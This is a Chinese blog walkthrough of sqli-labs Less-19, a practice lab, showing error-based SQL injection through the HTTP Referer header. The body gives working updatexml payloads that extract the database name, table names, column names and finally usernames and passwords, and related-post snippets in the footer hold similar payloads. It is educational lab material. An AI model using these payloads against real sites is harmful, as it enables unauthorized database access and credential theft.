sqli-labs/Less-19

最新推荐文章于 2024-05-28 11:44:38 发布
最新推荐文章于 2024-05-28 11:44:38 发布
阅读量210 收藏
点赞数
文章标签: 数据库 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71299382/article/details/127931166
版权

这一关模式和上一关一样 就是都需要通过抓包进行注入 废话不多说 开解

这一关再输入正确的用户名和密码之后 会回显ip地址和referer参数

所以我们把referer当作注入点来解题

首先抓包

然后发送到repeater修改referer参数值为'1'

发现报错信息 又是和上一关一样 

然后输入'' 没有报错 有和上一关一样

所以我们利用' and xxx and '来进行报错注入 因为这句话可执行

首先爆库

输入如下

' and updatexml(1,concat(0x7e,database(),0x7e),1) and '

回显如下

爆表 输入如下

' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) and '

 回显如下

爆字段 输入如下

' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()),0x7e),1) and '

 回显如下

爆用户名和密码信息 输入如下

' and updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1) and '

 回显如下

成功解题 嗨嗨!! 

axihaihai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
SQL Assistant 7.1
12-28
SQL Assistant 7.1 带注册机,官网下载真心太坑!!
SQLServer数据库还原问题
07-16
This function has none of DETERMINISTIC, NO SQL, or READS SQL DATA in its declaration and binary logging is enabled (you *might* want to use the less safe log_bin_trust_function_creators variable)
ingres数据库SQL注入手册1
08-08
Ingres SQL Injection Cheat SheetIngres seems to be one of the less common databa
sqli-labs-less-18、19、20、21、22
giun的博客
02-13 1377
先学习下http头部常见的一些关键字 Accept: 浏览器能够处理的内容类型 Accept-Charset: 浏览器能够显示的字符集 Accept-Encoding:浏览器能够处理的压缩编码。 Accept-Language: 浏览器当前设置的语言。 Connection:浏览器与服务器之间连接的类型 Cookie:当前页面设置的任何Cookie Host:发出请求的页面所在的域。 Refere...
SQLi LABS Less-19
热门推荐
wangyuxiang946的博客
08-14 1万+
19关使用POST请求提交参数,后端对用户名和密码进行了特殊字符转译,难度较大源码如下 但后面插入HTTP Referer时,并没有对参数进行过滤,我们可以从Referer入手 首先,输入正确的账号和密码,只有账号和密码都正确,才能操作Referer 然后使用代理软件(Burp Suite)拦截POST请求,修改Referer的参数,页面出现了报错信息,接下来即可使用报错注入进行脱库 1' and updatexml(1,0x7e,1) and ' 获...
sqli-labs Less 19
m0_60829468的博客
11-05 241
​​​​​​ 一、观察less19,思考 观察less19发现,19关的设定和18关十分相识,细节部分可以看我的18关闯关详细讲解,这里直接开始通关流程。 二、查数据库名 Referer: http://localhost/sqlilabs/Less-19/'and extractvalue(1,concat(0x7e,database(),0x7e)) and ' 三、查询表名 Referer: http://localhost/sqlilabs/Less-19/'and..
sqli-labs:less-19
羽的博客
09-09 98
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; char...
sqli-lab-less19
Sa1nZen的博客
08-05 82
sqli-lab-less19
sqli-labs ————less -19
Fly_鹏程万里
05-12 1054
Less-19提交一个测试数据试试:username:adminpassword:aaa由此可以看到出现了Referer,我们不妨来看看源代码:&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt; ...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs(19)
weixin_30615767的博客
05-27 108
百度了一下 基于错误的referer头的注入 0X01爱之初体验 猜测是基于referer头的注入 我们在referer后面加入单引号测试一下 真的报错了诶 那我们猜测一下 他应该是把 referer插入到数据库中去了 语句怎么构造呐? 说实话 这里我不知道 得看看源码才能知道 因为还不熟悉结构 原来是将referer和ip插入到数据库中去 只有两个要插入 那我们尝试一下构造...
Sqlilabs-19
KAKA的博客
07-09 340
19 关跟第 18 关类似,User-Agent 改成了 Referer 改造注入 –Referer “浏览器向 WEB 服务器表明自己是从哪个网页 /URL 获得/点击 当前请求中的网址/URL” 同样的,这一关对 usernanme 和 password 都进行了 check_input hackbar 制作针对 referer 的 payload: –查表 1' and extractvalue(1,concat(0x7e,(select table_name from information_
sqli-labs (less-19)
kukudeshuo的博客
03-11 340
sqli-labs (less-19) 进入19关,输入用户名和密码,发现屏幕回显了我们的IP地址和Referer头,根据18关踩得坑,这里我们可以大胆猜想注入点就在Referer头里 使用burpsuite抓包 抓包后发现,根本就没有Referer头,怎么办呢,没事,我们可以自己添加Referer头,添加完后我们输入’试试 系统报错,验证了我们的猜想,也说明了闭合方式为’ or ‘1’='1,并且为字符型注入 查库 后面的过程与less-18完全一样,具体过程请看我的less-18 ...
sqli-labs (less18-less19)
Xi4or0uji
08-01 1675
less 18 头部注入:user_agent 这里不补充http头的知识了,直接看源码可以看到,uname和passwd都有check_input函数检查,所以直接这两个参数注入是不行的了,然后再继续看下去 有句sql语句有ip_address和uagent两个参数,而且前面没有检查,可以考虑注入,但是ip一般是数字,比较麻烦,所以决定用uagent注入 这里给个脚本,其实重点只是s...
Sqli-labs之Less-18和Less-19
→_→
04-12 3162
Less-18 基于错误的用户代理,头部POST注入 (注:这一个模拟的场景是注册登录后的注入) 由题意可知,这又是一种新姿势,老方法,查找注入点,发现前面的方法都未成功。且错误回显与正确回显都显示IP: 这里写说几个常用请求头:(上一篇文章详细讲过) Host ...
书籍学习|基于SprinBoot+vue的书籍学习平台(源码+数据库+文档)
最新发布
JIngJaneIL的博客
05-28 1040
首先,论文一开始便是清楚的论述了平台的研究内容。其次,剖析平台需求分析,弄明白“做什么”,分析包括业务分析和业务流程的分析以及用例分析,更进一步明确平台的需求。然后在明白了平台的需求基础上需要进一步地设计平台,主要包罗软件架构模式、整体功能模块、数据库设计。本项目软件架构选择B/S模式和java技术,总体功能模块运用自顶向下的分层思想。再然后就是实现平台并进行代码编写实现功能。论文的最后章节总结一下自己完成本论文和开发本项目的心得和总结。通过书籍学习平台将会使书籍学习各个方面的工作效率带来实质性的提升。
sqli-labs/Less-28
01-09
1. 打开sqli-labs实验平台,并找到Less-28实验。 2. 在输入框中输入以下内容进行注入: ``` ' or 1=1)# ``` 这个注入语句的作用是闭合原始查询并使其返回所有结果。 3. 提交注入语句并查看结果。如果页面显示了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

axihaihai

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值